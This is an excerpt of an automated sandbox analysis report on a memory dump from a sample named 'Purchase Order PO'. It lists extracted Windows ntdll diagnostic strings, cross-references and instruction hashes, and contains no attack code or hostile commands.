                                                                                                                            • Instruction Fuzzy Hash: 0C0290B1D042299FDB35DB54CD84BEAB7B8AF44704F4441EAE609A7281DB309F88CF59
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                            Strings
                                                                                                                            • VerifierDebug, xrefs: 01B18CA5
                                                                                                                            • VerifierFlags, xrefs: 01B18C50
                                                                                                                            • HandleTraces, xrefs: 01B18C8F
                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B18A3D
                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01B18B8F
                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B18A67
                                                                                                                            • VerifierDlls, xrefs: 01B18CBD
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                            Strings
                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01AE9A01
                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01AE9A2A
                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01AE99ED
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01AE9A11, 01AE9A3A
                                                                                                                            • LdrpInitShimEngine, xrefs: 01AE99F4, 01AE9A07, 01AE9A30
                                                                                                                            • apphelp.dll, xrefs: 01A86496
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                            Strings
                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01B08181, 01B081F5
                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 01B08177, 01B081EB
                                                                                                                            • LdrpInitializeProcess, xrefs: 01ACC6C4
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01ACC6C3
                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01B08170
                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B081E5
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                            Strings
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B02178
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B02180
                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01B02160, 01B0219A, 01B021BA
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01B02165
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B021BF
                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B0219F
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 01AD2DF0: LdrInitializeThunk.NTDLL ref: 01AD2DFA
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD0BA3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD0BB6
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD0D60
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD0D74
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                            Strings
                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AC855E
                                                                                                                            • LdrpInitializeProcess, xrefs: 01AC8422
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01AC8421
                                                                                                                            • @, xrefs: 01AC8591
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                            Strings
                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B021D9, 01B022B1
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B022B6
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01B021DE
                                                                                                                            • .Local, xrefs: 01AC28D8
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                            Strings
                                                                                                                            • RtlDeactivateActivationContext, xrefs: 01B03425, 01B03432, 01B03451
                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B03437
                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B0342A
                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B03456
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                            Strings
                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AF10AE
                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AF106B
                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AF0FE5
                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AF1028
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                            Strings
                                                                                                                            • LdrpDynamicShimModule, xrefs: 01AFA998
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01AFA9A2
                                                                                                                            • apphelp.dll, xrefs: 01AB2462
                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01AFA992
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                            Strings
                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AA327D
                                                                                                                            • HEAP: , xrefs: 01AA3264
                                                                                                                            • HEAP[%wZ]: , xrefs: 01AA3255
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $@
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                            Strings
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01AFA121
                                                                                                                            • LdrpCheckModule, xrefs: 01AFA117
                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 01AFA10F
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                            Strings
                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 01B082DE
                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 01B082D7
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01B082E8
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-1783798831
                                                                                                                            Strings
                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B4C1C5
                                                                                                                            • PreferredUILanguages, xrefs: 01B4C212
                                                                                                                            • @, xrefs: 01B4C1F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                            • API String ID: 0-2968386058
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                            • API String ID: 0-1373925480
                                                                                                                            Strings
                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B14888
                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01B14899
                                                                                                                            • LdrpCheckRedirection, xrefs: 01B1488F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                            • API String ID: 0-3154609507
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-2558761708
                                                                                                                            Strings
                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 01B120F3
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01B12104
                                                                                                                            • LdrpInitializationFailure, xrefs: 01B120FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-2986994758
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: #%u
                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                            Strings
                                                                                                                            • LdrResSearchResource Enter, xrefs: 01A9AA13
                                                                                                                            • LdrResSearchResource Exit, xrefs: 01A9AA25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                            • API String ID: 0-4066393604
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: `$`
                                                                                                                            • API String ID: 0-197956300
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$MUI
                                                                                                                            • API String ID: 0-17815947
                                                                                                                            Strings
                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A9063D
                                                                                                                            • kLsE, xrefs: 01A90540
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                            • API String ID: 0-2547482624
                                                                                                                            Strings
                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 01A9A2FB
                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 01A9A309
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                            • API String ID: 0-2876891731
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 0-1339004836
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: GlobalTags
                                                                                                                            • API String ID: 0-1106856819
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .mui
                                                                                                                            • API String ID: 0-1199573805
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: EXT-
                                                                                                                            • API String ID: 0-1948896318
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: AlternateCodePage
                                                                                                                            • API String ID: 0-3889302423
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: BinaryHash
                                                                                                                            • API String ID: 0-2202222882
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #
                                                                                                                            • API String ID: 0-1885708031
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: BinaryName
                                                                                                                            • API String ID: 0-215506332
                                                                                                                            Strings
                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B1895E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                            • API String ID: 0-702105204
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3a30f18325ee6ecb40d5770709c33b04daffbbe8b4e15e38f4335ec66384adbb
                                                                                                                            • Instruction ID: d06a00d491f4c8a965d815ac3293b49497540161359bf2307c9b4dc35ef31763
                                                                                                                            • Opcode Fuzzy Hash: 3a30f18325ee6ecb40d5770709c33b04daffbbe8b4e15e38f4335ec66384adbb
                                                                                                                            • Instruction Fuzzy Hash: A7915731A00612CBEB25EBA8D480BBEBBB5EF94714F498069FA45DB391E734DD01C791
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5ed9594e1552bcd81ebaf06dcc47993dfd98c1b4d995383219881e3c0d5d890d
                                                                                                                            • Instruction ID: 5d6d2e65a945de4d5a4802064fec46b7aad0878ff0dc00dd3e237e0cc12cbfa7
                                                                                                                            • Opcode Fuzzy Hash: 5ed9594e1552bcd81ebaf06dcc47993dfd98c1b4d995383219881e3c0d5d890d
                                                                                                                            • Instruction Fuzzy Hash: 80819471E006169FDB24CF69C984ABEBBF9FB58700F04892EE459D7640E334D941CBA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                            • Instruction ID: f404ee99c234329dfa9fcf47cc8182962904561978bb5c1dc7f3bd35acf26120
                                                                                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                            • Instruction Fuzzy Hash: CA815231A002099FDF59DFA9C890BAEBBF6FF84210F1486A9DD15AB385D774D901CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4c592e771e49de66bfd0a57170af1632645a548a2677b11965aaed838fcd006e
                                                                                                                            • Instruction ID: 670ae8704589234f82d960cbcfbcc8e7cce22deb54bbdad2f138df8361c8f79d
                                                                                                                            • Opcode Fuzzy Hash: 4c592e771e49de66bfd0a57170af1632645a548a2677b11965aaed838fcd006e
                                                                                                                            • Instruction Fuzzy Hash: 0E817F71A00609AFDB26CFA9C980BEEBBFAFF48754F14442DE556A7250D730AD05CB60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
